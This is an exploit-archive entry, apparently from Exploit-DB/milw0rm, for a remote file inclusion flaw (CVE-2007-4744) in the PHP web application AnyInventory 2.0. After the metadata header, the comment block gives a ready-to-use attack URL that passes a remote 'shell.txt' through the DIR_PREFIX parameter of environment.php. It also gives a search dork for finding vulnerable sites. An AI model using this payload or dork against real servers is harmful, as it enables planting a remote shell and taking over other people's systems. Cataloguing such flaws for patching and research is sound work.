AnyInventory 2.0 - 'Environment.php' Remote File Inclusion
Author: ThE TiGeR
type: webapps
platform: php
port:
date_added: 2007-09-04
date_updated: 2016-10-12
verified: 1
codes: OSVDB-36846;CVE-2007-4744
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comanyInventory-1.9.1.tar.gz
#AnyInventory => 2.0 Remote file inclusion
#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz
#Exploit :
#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?
#Dork : anyInventory, the most flexible and powerful web-based inventory system
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail.com
# milw0rm.com [2007-09-05]